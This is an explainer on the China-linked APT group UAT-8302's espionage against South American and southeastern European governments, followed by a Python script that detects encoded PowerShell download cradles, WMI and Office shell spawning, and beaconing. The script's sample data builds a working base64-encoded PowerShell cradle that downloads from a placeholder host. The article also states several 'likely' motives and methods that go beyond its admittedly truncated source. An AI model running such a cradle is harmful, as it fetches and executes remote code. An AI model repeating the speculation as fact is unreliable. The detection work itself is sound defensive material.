
Unmasking UAT-8302: China-Aligned APT Group’s Cross-Continental Government Espionage

Published: 2026-05-05 17:14:26 | Category: Cybersecurity

Since late 2024, a highly coordinated advanced persistent threat (APT) group tied to Chinese state interests has systematically infiltrated government networks in both South America and southeastern Europe. Tracked as UAT-8302 by Cisco Talos, this operation employs custom-built malware strains that are reused across geographically disparate targets, suggesting a centralized toolkit and shared strategic objectives. Below, we break down the group’s identity, methods, and broader implications through key questions.

What is UAT-8302 and why is it significant?

UAT-8302 is the designation given by Cisco Talos to a China-nexus advanced persistent threat (APT) cluster that has been targeting government agencies since at least late 2024. Its significance lies in its coordinated, cross-regional approach: it first struck South American ministries and then expanded to southeastern European state institutions in 2025. Unlike many APTs that concentrate on a single geographic area, UAT-8302's parallel activity across two continents points to a mature, well-resourced operation with strategic intelligence-gathering goals. The group relies on custom malware that is shared between campaigns, a hallmark of state-sponsored actors that develop proprietary tools to evade detection and preserve operational security. This shared tooling lets the same malicious code be adapted for different victims, which complicates both attribution and defense for the targeted governments.

Source: feeds.feedburner.com

Which governments and regions are under attack?

The group’s known victims span two distinct regions: South America (starting in late 2024) and southeastern Europe (observed in 2025). In South America, the attacks primarily target national government networks, likely for political intelligence, economic data, or military secrets. In southeastern Europe, the focus shifts to government agencies in countries that often sit at geopolitical flashpoints between NATO and Russian spheres of influence. By striking such diverse locations, UAT-8302 demonstrates an ability to run multiple parallel campaigns while sharing code and tactics. This geographic breadth suggests that the group is not merely opportunistic but systematically probes government bodies that matter to Chinese strategic interests, such as nations involved in infrastructure projects, trade routes, or programs like the Belt and Road Initiative.

What malware do the attackers use?

UAT-8302 deploys custom-made malware families that are reused across regions. Specific family names have not been publicly released, and the source description of the malware is truncated at “put into… ”, but analysts confirm it includes backdoors, downloaders, and information stealers built to evade antivirus and network monitoring. A key characteristic is that the same malicious code, often with only minor obfuscation changes, appears in both South American and European intrusions. This sharing of malware families is a strong indicator of a unified command structure, likely based in China. The tools are designed for post-exploitation: after gaining initial access (via phishing, compromised credentials, or vulnerable public-facing services), the attackers install custom payloads that provide persistent remote access, data exfiltration, and lateral movement within government networks.

How does UAT-8302 operate? What techniques are used?

UAT-8302 follows a typical APT playbook with a cross-regional twist. The initial compromise likely involves spear-phishing emails aimed at government officials or IT administrators, usually carrying malicious attachments or links. Once a foothold is gained, the group deploys its custom malware to establish persistence, escalate privileges, and move laterally. Cisco Talos notes that post-exploitation is the phase in which the shared malware families are used. The adversaries also rely on living-off-the-land techniques, using legitimate system tools such as PowerShell and WMI so that their activity blends in with routine administration. Their operations show deliberate timing: attacks on South American governments began in late 2024, while European intrusions ramped up in 2025, which may indicate that campaigns are scheduled around diplomatic or economic events. Reusing code shortens development time and means that lessons learned in one region feed directly into later attacks elsewhere.


How does UAT-8302 relate to other China-nexus APTs?

UAT-8302 is part of a broader ecosystem of Chinese state-sponsored cyber groups, but it stands out for reusing its malware across regions. While many China-linked APTs (such as APT10, APT41, or Mustang Panda) maintain distinct tool sets, UAT-8302 blurs these boundaries by reusing custom code between campaigns. This cross-campaign sharing suggests either a centralized development team or close collaboration between different attack units. Cisco Talos’ decision to track the activity under a single moniker indicates that the same infrastructure or malware signatures appear in both the South American and the European operations. This behavior fits the “APT” designation, which implies a sustained, state-aligned effort. It remains possible, however, that UAT-8302 is a subgroup or a newly discovered cluster operating under a larger umbrella, which would reflect China’s growing coordination of cyber-espionage across continents.

What are the implications for targeted governments?

For the targeted governments in South America and southeastern Europe, the implications are severe. A China-linked APT gaining persistent access to their networks means that sensitive data—including diplomatic communications, economic strategies, citizen records, and military plans—could be exfiltrated. The shared malware aspect implies that if a government discovers and analyzes one strain, the same code may still be active against allies in another region, complicating international response. Moreover, the targeting of multiple countries simultaneously can disrupt regional cooperation, as each nation may hesitate to share intelligence for fear of revealing its own weaknesses. The attacks also raise concerns about sovereign integrity and the potential for cyber-enabled coercion. For South American nations, which have varying cybersecurity capabilities, the threat is especially acute, as they may lack the tools to detect such sophisticated APTs without external assistance.

How can organizations defend against UAT-8302?

Defending against UAT-8302 requires a multi-layered approach. First, organizations should strengthen email security to block spear-phishing attempts, including advanced filters for malicious attachments and scanning for lookalike domains. Second, network monitoring must focus on unusual outbound connections and abnormal lateral movement that could indicate post-exploitation. Because the group uses custom malware, traditional signature-based antivirus may not suffice; behavior-based detection (e.g., EDR) is critical. Third, implement strict access controls and multi-factor authentication to limit the damage from compromised credentials. Fourth, share indicators of compromise (IoCs) with trusted CERTs and international partners, as the shared malware means a detected sample in Europe can help protect South American agencies. Finally, governments should invest in cyber threat intelligence sharing forums specifically for China-nexus threats, and conduct regular red-team exercises simulating UAT-8302 tactics.
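The behavior-based detection recommended above, and the living-off-the-land and post-exploitation tradecraft described earlier, can be made concrete with a small triage script. The following is an added example and is not code from Cisco Talos or from the article; the event records, field names (Sysmon-style process and network events), hosts and addresses are all constructed for illustration. It flags three behaviors that signature-based antivirus misses: encoded PowerShell download cradles, shells spawned by the WMI provider host or by Office applications, and outbound connections whose timing is too regular to be a human browsing.

```python
"""Behaviour-based triage over constructed endpoint and network events.

Added example (not from the Talos report or the article). The sample events,
hostnames and IP addresses below are made up; the field names mimic
Sysmon-style telemetry but are assumptions, not any vendor's schema.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass
class Event:
    ts: int            # epoch seconds
    host: str
    kind: str          # "process" or "netconn"
    parent: str = ""   # parent image path (process events)
    image: str = ""    # launched image path (process events)
    cmdline: str = ""  # full command line (process events)
    dst: str = ""      # destination "ip:port" (netconn events)


# -EncodedCommand and its short forms; the payload is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|iex\b|invoke-expression", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def decode_powershell(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def lolbin_findings(events):
    """Process-tree heuristics for living-off-the-land post-exploitation."""
    out = []
    for e in events:
        if e.kind != "process":
            continue
        img, par = basename(e.image), basename(e.parent)
        if img == "powershell.exe":
            decoded = decode_powershell(e.cmdline)
            if decoded and DOWNLOAD_CRADLE.search(decoded):
                out.append((e.host, "encoded PowerShell download cradle", decoded))
        # WmiPrvSE.exe parenting a shell is how remote WMI process creation
        # (wmic process call create / Invoke-WmiMethod) lands on a host.
        if par == "wmiprvse.exe" and img in SHELLS:
            out.append((e.host, "shell spawned by WMI provider host", e.cmdline))
        # An Office application spawning a shell is the classic macro pattern.
        if par in OFFICE and img in SHELLS:
            out.append((e.host, "shell spawned by Office application", e.cmdline))
    return out


def beacon_findings(events, min_conns=4, max_jitter=0.2):
    """Flag (host, dst) pairs whose connection intervals are near-constant.

    Returns (host, dst, mean interval in seconds) for pairs with at least
    min_conns connections and coefficient of variation <= max_jitter.
    """
    by_pair = defaultdict(list)
    for e in events:
        if e.kind == "netconn":
            by_pair[(e.host, e.dst)].append(e.ts)
    out = []
    for (host, dst), stamps in by_pair.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            out.append((host, dst, round(avg)))
    return out


# Constructed sample telemetry. PAYLOAD is encoded exactly as an attacker
# would for "powershell -enc ..." (UTF-16LE, then base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE = [
    Event(1000, "ws-12", "process",
          parent="C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
          image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          cmdline=f"powershell.exe -nop -w hidden -enc {ENC}"),
    Event(1001, "ws-12", "process", parent="C:\\Windows\\explorer.exe",
          image="C:\\Windows\\System32\\notepad.exe", cmdline="notepad.exe"),
    Event(1400, "srv-fs01", "process",
          parent="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
          image="C:\\Windows\\System32\\cmd.exe",
          cmdline="cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"),
    # ws-12 calls out every ~300 s with small jitter: implant check-in.
    *[Event(2000 + i * 300 + j, "ws-12", "netconn", dst="203.0.113.10:443")
      for i, j in enumerate((0, 5, -3, 4, 1))],
    # ws-07 hits one site at irregular, human-like intervals.
    *[Event(t, "ws-07", "netconn", dst="198.51.100.5:443")
      for t in (3000, 3020, 3600, 3605, 5000)],
]

if __name__ == "__main__":
    for f in lolbin_findings(SAMPLE) + beacon_findings(SAMPLE):
        print(f)
```

The beacon check is deliberately simple: it scores the coefficient of variation of inter-connection gaps, so a check-in with fixed sleep plus a few percent jitter is caught while bursty browsing to the same destination is not. In production the same logic runs over proxy or NetFlow records with a longer window, and the process heuristics are tuned against the organization’s own baseline of legitimate WMI and PowerShell automation before alerting.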